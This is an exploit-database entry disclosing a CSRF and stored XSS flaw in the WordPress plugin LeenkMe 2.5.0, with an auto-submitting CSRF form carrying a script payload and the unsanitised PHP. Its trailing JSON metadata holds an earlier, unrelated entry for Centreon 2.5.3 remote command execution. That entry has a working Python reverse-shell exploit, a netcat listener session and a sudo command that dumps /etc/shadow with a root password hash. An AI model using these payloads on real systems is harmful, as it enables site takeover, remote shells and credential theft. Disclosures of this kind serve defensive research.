ID 1337DAY-ID-25009
Type zdt
Reporter cor3sm4sh3r
Modified 2016-04-18T00:00:00
Description
Exploit for php platform in category web applications
I would like to disclose CSRF and stored XSS vulnerability in Wordpress
plugin LeenkMe version 2.5.0.
The plugin can be found at https://wordpress.org/plugins/leenkme/
In the page wp-content/plugins/leenkme/facebook.php
XSS vulnerable Fields are :
- facebook_message
- facebook_linkname
- facebook_caption
- facebook_description
- default_image
- _wp_http_referer
This CSRF is tested on latest wordpress installation 4.4.2 using firefox
browser.
The Code for CSRF.html is
<html>
<body onload="document.forms['xss'].submit()" >
<form name="xss" action="
http://127.0.0.1/wp/wp-admin/admin.php?page=leenkme_facebook" method="POST">
<input type="hidden" name="facebook_profile" value="on" />
<input type="hidden" name="fb_publish_wpnonce" value="" />
<input type="hidden" name="_wp_http_referer" value="XSS" />
<input type="hidden" name="facebook_message" value="XSS" />
<input type="hidden" name="facebook_linkname" value="XSS" />
<input type="hidden" name="facebook_caption" value="XSS" />
<input type="hidden" name="facebook_description" value="
</textarea><script>prompt();</script>" />
<input type="hidden" name="default_image" value="XSS" />
<input type="hidden" name="message_preference" value="author" />
<input type="hidden" name="clude" value="in" />
<input type="hidden" name="publish_cats[]" value="0" />
<input type="hidden" name="update_facebook_settings"
value="Save Settings" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
The vulnerable page is
wp-content/plugins/leenkme/facebook.php
The vulnerable code producing XSS is
if ( !empty( $_REQUEST['facebook_message'] ) )
$user_settings['facebook_message'] = $_REQUEST['facebook_message'];
else
$user_settings['facebook_message'] = '';
if ( !empty( $_REQUEST['facebook_linkname'] ) )
$user_settings['facebook_linkname'] = $_REQUEST['facebook_linkname'];
else
$user_settings['facebook_linkname'] = '';
if ( !empty( $_REQUEST['facebook_caption'] ) )
$user_settings['facebook_caption'] = $_REQUEST['facebook_caption'];
else
$user_settings['facebook_caption'] = '';
if ( !empty( $_REQUEST['facebook_description'] ) )
$user_settings['facebook_description'] = $_REQUEST['facebook_description'];
-------------------------
-------------------------
-------------------------
snip
------------------------
-------------------------
--------------------------
<td><textarea name="facebook_message" style="width: 500px;"
maxlength="400"><?php
echo $user_settings['facebook_message']; ?></textarea></td>
</tr>
<tr>
<td><?php _e( 'Default Link Name:', 'leenkme'
); ?></td>
<td><input name="facebook_linkname"
type="text" style="width: 500px;" value="<?php echo
$user_settings['facebook_linkname']; ?>" maxlength="100"/></td>
</tr>
<tr>
<td><?php _e( 'Default Caption:', 'leenkme' );
?></td>
<td><input name="facebook_caption"
type="text" style="width: 500px;" value="<?php echo
$user_settings['facebook_caption']; ?>" maxlength="100"/></td>
</tr>
<tr>
<td style='vertical-align: top; padding-top:
5px;'><?php _e( 'Default Description:', 'leenkme' ); ?></td>
<td><textarea name="facebook_description"
style="width: 500px;" maxlength="300"><?php echo
$user_settings['facebook_description']; ?></textarea></td>
The code used to protect against CSRF that is the anti csrf token used is
<?php wp_nonce_field( 'fb_publish', 'fb_publish_wpnonce' ); ?>
But this code is not protecting against the CSRF, the form get submitted
successfully with out any error even though the fb_publish_wpnonce is kept
empty resulting in CSRF vulnerability.
# Author email: cor3sm4sh3r[at]gmail.com
# Contact: https://in.linkedin.com/in/cor3sm4sh3r
# Twitter: https://twitter.com/cor3sm4sh3r
# 0day.today [2018-02-19] #
{"published": "2016-04-18T00:00:00", "id": "1337DAY-ID-25009", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["published", "reporter", "modified", "sourceHref", "sourceData", "title", "href"], "edition": 1, "lastseen": "2016-04-20T01:39:28", "bulletin": {"published": "2016-02-26T00:00:00", "id": "1337DAY-ID-25009", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.0, "modified": "2016-04-20T01:39:28"}}, "hash": "c4d4b80cc651b9255d03547c9fada2ecbdbc014792acea13fefe276e2b76f733", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T01:39:28", "edition": 1, "title": "Centreon 2.5.3 - Remote Command Execution Exploit", "href": "http://0day.today/exploit/description/25009", "modified": "2016-02-26T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "http://0day.today/exploit/25009", "references": [], "reporter": "Sysdream", "sourceData": "Unauthenticated Remote Command Execution in Centreon Web Interface\r\n==================================================================\r\n \r\n \r\nDescription\r\n===========\r\n \r\nCentreon is a popular monitoring solution.\r\n \r\nA critical vulnerability has been found in the Centreon logging class\r\nallowing remote users to execute arbitrary commands.\r\n \r\n \r\nSQL injection leading to RCE\r\n============================\r\n \r\nCentreon logs SQL database errors in a log file using the \"echo\" system\r\ncommand and the exec() PHP function. On the authentification class,\r\nCentreon use htmlentities with the ENT_QUOTES options to filter SQL\r\nentities.\r\nHowever, Centreon doesn't filter the SQL escape character \"\\\" and it is\r\npossible to generate an SQL Error.\r\nBecause of the use of the \"echo\" system command with the PHP exec()\r\nfunction, and because of the lack of sanitization, it is possible to\r\ninject arbitrary system commands.\r\n \r\n**Access Vector**: remote\r\n \r\n**Security Risk**: high\r\n \r\n**Vulnerability**: CWE-78\r\n \r\n----------------\r\nProof of Concept\r\n----------------\r\n \r\nTCP Reverse Shell using python.\r\n \r\n #!/usr/bin/env python\r\n import requests\r\n import argparse\r\n \r\n def shell(target, reverseip, reverseport):\r\n payload = 'import socket as a,subprocess as b,os as\r\nc;s=a.socket(2,1);s.connect((\"%s\",%d));d=s.fileno();c.dup2(d,0);c.dup2(d,1);c.dup2(d,2);p=b.call([\"sh\"]);'\r\n% (reverseip,reverseport)\r\n print \"[~] Starting reverseshell : %s - port : %d\" % (reverseip,\r\nreverseport)\r\n req = requests.post(target, data={\"useralias\": \"$(echo %s |\r\nbase64 -d | python)\\\\\" % payload.encode(\"base64\").replace(\"\\n\",\"\"),\r\n\"password\": \"foo\"})\r\n print \"[+] DEAD !\"\r\n \r\n if __name__ == \"__main__\":\r\n print \"[~] Centreon Unauthentificated RCE - Nicolas Chatelain\r\n<n.chatelain@sysdream.com>\"\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"--target\", required=True)\r\n parser.add_argument(\"--reverseip\", required=True)\r\n parser.add_argument(\"--reverseport\", required=True, type=int)\r\n args = parser.parse_args()\r\n shell(args.target, args.reverseip, args.reverseport)\r\n \r\nShell :\r\n \r\n nightlydev@nworkstation ~/Lab/Centreon $ python reverseshell.py\r\n--target=http://172.16.138.137/centreon/index.php\r\n--reverseip=172.16.138.1 --reverseport 8888\r\n [~] Centreon Unauthentificated RCE - Nicolas Chatelain\r\n<n.chatelain@sysdream.com>\r\n [~] Starting reverseshell : 172.16.138.1 - port : 8888\r\n \r\n# Other term\r\n \r\nnightlydev@nworkstation ~/Lab/Centreon $ nc -lvp 8888\r\nNcat: Version 6.45 ( http://nmap.org/ncat )\r\nNcat: Listening on :::8888\r\nNcat: Listening on 0.0.0.0:8888\r\nNcat: Connection from 172.16.138.135.\r\nNcat: Connection from 172.16.138.135:50050.\r\nwhoami\r\napache\r\ngroups\r\napache centreon-engine centreon-broker centreon nagios\r\n \r\n \r\n---------------\r\nVulnerable code\r\n---------------\r\n \r\nThe vulnerable code is located in class/centreonLog.class.php, line 82\r\nand line 154:\r\n \r\n \r\n /*\r\n * print Error in log file.\r\n */\r\n exec(\"echo \\\"\".$string.\"\\\" >> \".$this->errorType[$id]);\r\n \r\nIn class/centreonAuth.class.php, line 227:\r\n \r\n $DBRESULT = $this->pearDB->query(\"SELECT * FROM `contact` WHERE\r\n`contact_alias` = '\" . htmlentities($username, ENT_QUOTES, \"UTF-8\") . \"'\r\nAND `contact_activate` = '1' AND `contact_register` = '1' LIMIT 1\");\r\n \r\n \r\n--------\r\nSolution\r\n--------\r\n \r\nUpdate to the Centreon 2.5.4\r\n \r\n \r\nPossible root password disclosure in centengine (Centreon Entreprise Server)\r\n============================================================================\r\n \r\nIn some configurations, when centengine can run as root (with sudo).\r\nIt's possible to read some file content.\r\n \r\n**Access Vector**: local\r\n \r\n**Security Risk**: high\r\n \r\n**Vulnerability**: CWE-209\r\n \r\n----------------\r\nProof of Concept\r\n----------------\r\n \r\n $ sudo /usr/sbin/centengine -v /etc/shadow\r\n [1416391088] reading main config file\r\n [1416391088] error while processing a config file: [/etc/shadow:1]\r\nbad variable name:\r\n'root:$6$3mvvEHQM3p3afuh4$DZ377daOy.8bn42t7ur82/Geplvsj90J7cs1xsgAbRZ0JDZ8KdB5CcQ0ucF5dwKpnBYLon1XBqjJPqpm6Zr5R0:16392:0:99999:7:::'\r\n [1416391088]\r\n \r\n---------------\r\nVulnerable code\r\n---------------\r\n \r\nIn Centreon Entreprise Server (CES) : /etc/sudoers.d/centreon\r\n \r\nCENTREON ALL = NOPASSWD: /usr/sbin/centengine -v *\r\n \r\n--------\r\nSolution\r\n--------\r\n \r\nDo not allow centengine to be run as root or do not disclose the line\r\nthat caused the error.\r\n \r\nTimeline (dd/mm/yyyy)\r\n=====================\r\n \r\n* 18/11/2014 : Initial discovery\r\n* 26/11/2014 : Contact with Centreon team\r\n* 27/11/2014 : Centreon correct vulnerabilities\r\n* 27/11/2014 : Centreon release version 2.5.4 that fixes vulnerabilities\r\n \r\nFixes\r\n=====\r\n \r\n*\r\nhttps://github.com/centreon/centreon/commit/a6dd914418dd185a698050349e05f10438fde2a9\r\n*\r\nhttps://github.com/centreon/centreon/commit/d00f3e015d6cf64e45822629b00068116e90ae4d\r\n*\r\nhttps://github.com/centreon/centreon/commit/015e875482d7ff6016edcca27bffe765c2bd77c1\r\n \r\nAffected versions\r\n=================\r\n \r\n* Centreon <= 2.5.3\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9c50550e427c769d7d61ffc88de5f477", "key": "href"}, {"hash": "68832c0310410afcc9723972e2c4b974", "key": "sourceData"}, {"hash": "d91b69c4b28b7efdfcbcd1b6944acadd", "key": "sourceHref"}, {"hash": "fc1cfdb4c3f0af98831862585769afb2", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8ddc9e2f9cefd1b20e84f94f6906ed01", "key": "reporter"}, {"hash": "b1ffc55f08dd8d1970f91dc09f9273c4", "key": "title"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "fc1cfdb4c3f0af98831862585769afb2", "key": "modified"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "80752f28047be42a5b4d33d4e4593cdec3729a1cffddb655adf0004e332b3711", "enchantments": {"vulnersScore": 4.3}, "type": "zdt", "lastseen": "2018-02-20T01:25:14", "edition": 2, "title": "WordPress leenk.me 2.5.0 Plugin - Cross-Site Request Forgery / Cross-Site Scripting", "href": "https://0day.today/exploit/description/25009", "modified": "2016-04-18T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "https://0day.today/exploit/25009", "references": [], "reporter": "cor3sm4sh3r", "sourceData": "I would like to disclose CSRF and stored XSS vulnerability in Wordpress\r\nplugin LeenkMe version 2.5.0.\r\n \r\nThe plugin can be found at https://wordpress.org/plugins/leenkme/\r\n \r\nIn the page wp-content/plugins/leenkme/facebook.php\r\n \r\nXSS vulnerable Fields are :\r\n \r\n - facebook_message\r\n - facebook_linkname\r\n - facebook_caption\r\n - facebook_description\r\n - default_image\r\n - _wp_http_referer\r\n \r\n \r\nThis CSRF is tested on latest wordpress installation 4.4.2 using firefox\r\nbrowser.\r\n \r\nThe Code for CSRF.html is\r\n \r\n<html>\r\n <body onload=\"document.forms['xss'].submit()\" >\r\n <form name=\"xss\" action=\"\r\nhttp://127.0.0.1/wp/wp-admin/admin.php?page=leenkme_facebook\" method=\"POST\">\r\n <input type=\"hidden\" name=\"facebook_profile\" value=\"on\" />\r\n <input type=\"hidden\" name=\"fb_publish_wpnonce\" value=\"\" />\r\n <input type=\"hidden\" name=\"_wp_http_referer\" value=\"XSS\" />\r\n <input type=\"hidden\" name=\"facebook_message\" value=\"XSS\" />\r\n <input type=\"hidden\" name=\"facebook_linkname\" value=\"XSS\" />\r\n <input type=\"hidden\" name=\"facebook_caption\" value=\"XSS\" />\r\n <input type=\"hidden\" name=\"facebook_description\" value=\"\r\n</textarea><script>prompt();</script>\" />\r\n <input type=\"hidden\" name=\"default_image\" value=\"XSS\" />\r\n <input type=\"hidden\" name=\"message_preference\" value=\"author\" />\r\n <input type=\"hidden\" name=\"clude\" value=\"in\" />\r\n <input type=\"hidden\" name=\"publish_cats[]\" value=\"0\" />\r\n <input type=\"hidden\" name=\"update_facebook_settings\"\r\nvalue=\"Save Settings\" />\r\n <input type=\"submit\" value=\"Submit form\" />\r\n </form>\r\n </body>\r\n</html>\r\n \r\n \r\nThe vulnerable page is\r\n \r\nwp-content/plugins/leenkme/facebook.php\r\n \r\nThe vulnerable code producing XSS is\r\n \r\n \r\nif ( !empty( $_REQUEST['facebook_message'] ) )\r\n$user_settings['facebook_message'] = $_REQUEST['facebook_message'];\r\nelse\r\n$user_settings['facebook_message'] = '';\r\nif ( !empty( $_REQUEST['facebook_linkname'] ) )\r\n$user_settings['facebook_linkname'] = $_REQUEST['facebook_linkname'];\r\nelse\r\n$user_settings['facebook_linkname'] = '';\r\nif ( !empty( $_REQUEST['facebook_caption'] ) )\r\n$user_settings['facebook_caption'] = $_REQUEST['facebook_caption'];\r\nelse\r\n$user_settings['facebook_caption'] = '';\r\nif ( !empty( $_REQUEST['facebook_description'] ) )\r\n$user_settings['facebook_description'] = $_REQUEST['facebook_description'];\r\n \r\n \r\n-------------------------\r\n-------------------------\r\n-------------------------\r\nsnip\r\n------------------------\r\n-------------------------\r\n--------------------------\r\n \r\n<td><textarea name=\"facebook_message\" style=\"width: 500px;\"\r\nmaxlength=\"400\"><?php\r\necho $user_settings['facebook_message']; ?></textarea></td>\r\n </tr>\r\n <tr>\r\n <td><?php _e( 'Default Link Name:', 'leenkme'\r\n); ?></td>\r\n <td><input name=\"facebook_linkname\"\r\ntype=\"text\" style=\"width: 500px;\" value=\"<?php echo\r\n$user_settings['facebook_linkname']; ?>\" maxlength=\"100\"/></td>\r\n </tr>\r\n <tr>\r\n <td><?php _e( 'Default Caption:', 'leenkme' );\r\n?></td>\r\n <td><input name=\"facebook_caption\"\r\ntype=\"text\" style=\"width: 500px;\" value=\"<?php echo\r\n$user_settings['facebook_caption']; ?>\" maxlength=\"100\"/></td>\r\n </tr>\r\n <tr>\r\n <td style='vertical-align: top; padding-top:\r\n5px;'><?php _e( 'Default Description:', 'leenkme' ); ?></td>\r\n <td><textarea name=\"facebook_description\"\r\nstyle=\"width: 500px;\" maxlength=\"300\"><?php echo\r\n$user_settings['facebook_description']; ?></textarea></td>\r\n \r\n \r\nThe code used to protect against CSRF that is the anti csrf token used is\r\n \r\n<?php wp_nonce_field( 'fb_publish', 'fb_publish_wpnonce' ); ?>\r\n \r\n \r\nBut this code is not protecting against the CSRF, the form get submitted\r\nsuccessfully with out any error even though the fb_publish_wpnonce is kept\r\nempty resulting in CSRF vulnerability.\r\n \r\n \r\n \r\n# Author email: cor3sm4sh3r[at]gmail.com\r\n# Contact: https://in.linkedin.com/in/cor3sm4sh3r\r\n# Twitter: https://twitter.com/cor3sm4sh3r\n\n# 0day.today [2018-02-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "6faf3589bd9013dba72439eef140ba16", "key": "href"}, {"hash": "eaaf44bb3c5c5359f816b0006c15db98", "key": "modified"}, {"hash": "eaaf44bb3c5c5359f816b0006c15db98", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "93bee27bba19d79ac9ef814de0f9b31f", "key": "reporter"}, {"hash": "f2338a1cb1a2a39602eb9636e59dc03d", "key": "sourceData"}, {"hash": "99c31de43e3e7d34b69c9555b0d7e4d4", "key": "sourceHref"}, {"hash": "60672971ea8664ddc781841590f1b18c", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"result": {}}